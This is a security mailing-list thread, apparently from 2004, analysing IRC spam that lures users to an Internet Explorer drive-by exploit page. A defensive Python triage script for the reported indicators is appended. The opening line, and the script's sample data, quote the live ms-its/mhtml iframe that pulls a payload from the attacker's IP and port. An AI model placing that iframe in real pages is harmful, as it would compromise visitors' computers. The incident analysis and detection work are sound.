<iframe src="ms-its:mhtml:file://c:\Css.MHT!http://69.157.174.169:2233//chm2.chm::/rundl.html" length="1" height="1"></iframe>
This leads me to believe it may be a malicious website set up in an attempt to exploit a flaw in IE that was discovered last month ("MSIE Unspecified File Processing Arbitrary Code Execution Vulnerability") and not a worm. You can get more info on it here:
http://www.securityfocus.com/bid/9658/info/
Good call alerting the ISP. Hopefully they'll knock it offline pretty quick.
Charles Hamby
Karousel wrote:
Hi,
I think it's a new worm spreading on Undernet. The worm PRIVMSGs users with an IP address and port like this (IP and port never change): [07:53] <C96347981> http://69.157.174.169:2233/
If you telnet to this address, you'll get
C:\telnet 69.157.174.169 2233
GET / HTTP/1.1

HTTP/1.1 200 OK
Server: My Bitchin' IE Infector
Date: Sat Mar 27 13:22:27 2004
Content-type: text/html
Accept-Encoding: identity
Accept-ranges: bytes
<<snip content>>
Connection to host lost.
C:\
It may not be related, but telnetting to port 80 will disconnect you with an "unknown" response as soon as you type a letter:
C:\telnet 69.157.174.169 80
GUNKNOWN
Connection to host lost.
C:\
Each user who sent me this address seems to have had the (almost) same pattern for nick and full name: one letter followed by numbers. Some full names are followed by 11 numbers, others by 12 numbers. None of them was on any channels at all.
C14130657 is Guest18231@Toronto-HSE-ppp3970074.sympatico.ca * E63731312752
S66185921 is ~M93079924@pcp01044550pcs.villgs01.fl.comcast.net * O12647092342
C96347981 is ~O98407918@host217-44-126-36.range217-44.btcentralplus.com * Y710488319397
M84234958 is Guest92377@AOrleans-103-1-33-71.w81-250.abo.wanadoo.fr * O58235883713
Z29553055 is Guest58875@nwc102-194.nwconx.net * E815603852272
O23413228 is Guest32361@062249161030.customer.alfanett.no * F729082226753
I65330976 is ~E89040321@adsl-216-103-54-205.dsl.lsan03.pacbell.net * C527516603470
The ISP (sympatico.ca) has been notified on March 27 at 10:00 am and this computer is still up.
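Added example, not part of either message in this thread: a small triage script that turns the indicators reported above (throwaway nicks of one letter plus eight digits, full names of one letter plus 11 or 12 digits, PRIVMSGs carrying a bare IP:port URL, and an <iframe> using the ms-its:mhtml handler) into checks a client log or a fetched page can be run through. The raw PRIVMSG line format and the "nick is user@host * realname" WHOIS summary format are assumptions about how a client logs them; the sample IRC lines are constructed from the hostnames quoted in the thread, with example.net/example.org lines added as benign controls, and the sample HTML is the iframe quoted at the top of the thread.

```python
import re

# Nick: one letter followed by eight digits (assumption: generalised from the
# nicks quoted in the thread, e.g. C96347981).
NICK_RE = re.compile(r"^[A-Za-z]\d{8}$")
# Realname: one letter followed by 11 or 12 digits, as the report describes.
REALNAME_RE = re.compile(r"^[A-Za-z]\d{11,12}$")
# URL whose host is a bare IPv4 address with an explicit port.
IP_URL_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\b")
# Raw IRC PRIVMSG line as a client or proxy would log it (assumed format).
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)!(?P<user>[^@\s]+)@(?P<host>\S+) PRIVMSG (?P<target>\S+) :(?P<text>.*)$"
)
# One-line WHOIS summary "nick is user@host * realname" (assumed client format).
WHOIS_RE = re.compile(r"^(?P<nick>\S+) is (?P<user>[^@\s]+)@(?P<host>\S+) \* (?P<realname>.*)$")
# <iframe ... src=...> with any quoting style.
IFRAME_SRC_RE = re.compile(r"<iframe\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)


def check_privmsg(line: str):
    """Flag a PRIVMSG only when both indicators coincide: the throwaway nick
    pattern and a link to a bare IP:port. Returns None otherwise."""
    m = PRIVMSG_RE.match(line)
    if not m:
        return None
    url = IP_URL_RE.search(m.group("text"))
    if not (NICK_RE.match(m.group("nick")) and url):
        return None
    return {"nick": m.group("nick"), "host": m.group("host"),
            "remote": f"{url.group(1)}:{url.group(2)}"}


def check_whois(line: str):
    """Flag a WHOIS summary whose nick and realname both follow the
    letter-plus-digits scheme."""
    m = WHOIS_RE.match(line)
    if not m:
        return None
    if NICK_RE.match(m.group("nick")) and REALNAME_RE.match(m.group("realname")):
        return {"nick": m.group("nick"), "host": m.group("host"),
                "realname": m.group("realname")}
    return None


def find_msits_iframes(html: str):
    """Return the src of every <iframe> that uses the ms-its: handler, plus the
    remote http(s) host:port embedded in it when one is present."""
    hits = []
    for src in IFRAME_SRC_RE.findall(html):
        if src.lower().startswith("ms-its:"):
            url = IP_URL_RE.search(src)
            hits.append({"src": src,
                         "remote": f"{url.group(1)}:{url.group(2)}" if url else None})
    return hits


# Constructed sample input: one PRIVMSG built from a host quoted in the thread,
# two benign controls, the seven WHOIS lines from the report plus one benign
# control, and the iframe quoted at the top of the thread.
SAMPLE_PRIVMSGS = [
    ":C96347981!~O98407918@host217-44-126-36.range217-44.btcentralplus.com PRIVMSG Karousel :http://69.157.174.169:2233/",
    ":alice!~alice@example.net PRIVMSG Karousel :have you seen http://example.org/page ?",
    ":bob!~bob@example.net PRIVMSG Karousel :http://192.0.2.10:8080/",
]
SAMPLE_WHOIS = [
    "C14130657 is Guest18231@Toronto-HSE-ppp3970074.sympatico.ca * E63731312752",
    "S66185921 is ~M93079924@pcp01044550pcs.villgs01.fl.comcast.net * O12647092342",
    "C96347981 is ~O98407918@host217-44-126-36.range217-44.btcentralplus.com * Y710488319397",
    "M84234958 is Guest92377@AOrleans-103-1-33-71.w81-250.abo.wanadoo.fr * O58235883713",
    "Z29553055 is Guest58875@nwc102-194.nwconx.net * E815603852272",
    "O23413228 is Guest32361@062249161030.customer.alfanett.no * F729082226753",
    "I65330976 is ~E89040321@adsl-216-103-54-205.dsl.lsan03.pacbell.net * C527516603470",
    "alice is ~alice@example.net * Alice Example",
]
SAMPLE_HTML = r'<iframe src="ms-its:mhtml:file://c:\Css.MHT!http://69.157.174.169:2233//chm2.chm::/rundl.html" length="1" height="1"></iframe>'


def triage(privmsgs, whois_lines, html):
    """Run all three checks and collect the hits in one report."""
    return {
        "privmsg": [h for h in map(check_privmsg, privmsgs) if h],
        "whois": [h for h in map(check_whois, whois_lines) if h],
        "iframes": find_msits_iframes(html),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_PRIVMSGS, SAMPLE_WHOIS, SAMPLE_HTML), indent=2))
```

The PRIVMSG check deliberately requires both the nick pattern and the bare IP:port URL, so an ordinary user pasting a link, or a bot with a normal nick, does not trip it; the remote host:port it extracts is the same value the iframe check pulls out of the ms-its: src, which is what ties the IRC spam to the hosted page.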